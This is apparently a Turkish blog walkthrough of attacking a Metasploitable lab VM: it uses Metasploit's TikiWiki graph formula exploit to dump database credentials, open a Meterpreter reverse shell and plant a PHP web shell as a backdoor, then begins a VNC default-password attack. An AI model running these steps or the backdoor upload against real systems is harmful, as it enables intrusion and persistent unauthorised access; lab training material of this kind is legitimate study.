Tikiwiki web tabanlı çalışan bir içerik yönetim sistemidir. Bizde bu sisteme sızmayı deneyeceğiz. İlk olarak metasploit frameworküne giriş yapıyoruz. Daha sonrasında search tikiwiki diyerek explotimizi seçeceğiz. Ve daha sonrasında gerekli parametreleri girerek shellimize ulaşmış olacağız.
msf6 exploit(tikiwiki_graph_formula_exec) > exploit
[*] Started reverse handler on 192.168.138.128:4444
[*] Attempting to obtain database credentials…
[*] The server returned : 200 OK
[*] Server version : Apache/2.2.8 (Ubuntu) DAV/2
[*] TikiWiki database informations :
db_tiki : mysql
dbversion : 1.9
host_tiki : localhost
user_tiki : root
pass_tiki :
dbs_tiki : tikiwiki
[*] Attempting to execute our payload…
[*] Sending stage (39217 bytes) to 192.168.138.129
[*] Meterpreter session 1 opened (192.168.138.128:4444 -> 192.168.138.129:55603) at 2013-07-28 11:18:36 +0300
meterpreter > sysinfo
Computer : metasploitable
OS : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Meterpreter : php/php
meterpreter > shell
Process 13125 created.
Channel 0 created.
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Sisteme root olarak giriş yapıldı. Yukarda kullanıcı adının root parolanın boş olduğu görülebilir.
Sisteme shell atarak bir backdoorda açılabilir. Bunun için http://phpshell.sourceforge.net/
deki shell kullanılmıştır. meterpreter ekranında upload yapılır:
meterpreter > upload /root/Desktop/phpshell-2.4/config.php /var/www/tikiwiki/backups
[*] uploading : /root/Desktop/phpshell-2.4/config.php -> /var/www/tikiwiki/backups
[*] uploaded : /root/Desktop/phpshell-2.4/config.php -> /var/www/tikiwiki/backups/config.php
meterpreter > upload /root/Desktop/phpshell-2.4/phpshell.php /var/www/tikiwiki/backups
[*] uploading : /root/Desktop/phpshell-2.4/phpshell.php -> /var/www/tikiwiki/backups
[*] uploaded : /root/Desktop/phpshell-2.4/phpshell.php -> /var/www/tikiwiki/backups/phpshell.php
Phpshellde varsayılan kullanıcı adı ve şifre koyulmamış. Bunun için
config.php yi upload etmeden önce [users]’ın altına kullanıcı_adı = “parola” eklenmelidir.
Upload ettikten sonra tarayıcıdan (upload edilen yere göre değişebilir) kullanıcı adı parola olarak ayarlanan değerler girilip shell ekranına ulaşılabilir ve istenilen komutlar çalıştırılablir.

vnc
Nessus taramasında VNC Server ‘password’ Password isminde kritik bir zafiyet keşfetti. Bu zafiyet oldukça kolay bir zafiyettir. Fakat kolay olduğu kadarda zor bulunan bir zafiyettir.
Açıklamada nessusun parola olarak “password” ile vnc bağlantısı yapabildiğimiz söyleniyor. Alttaki kodu girerek ve zafiyetin yapılacağı adresi girerek sızma işlemimize başlayalım.
[…] Tikiwiki […]
[…] Tikiwiki […]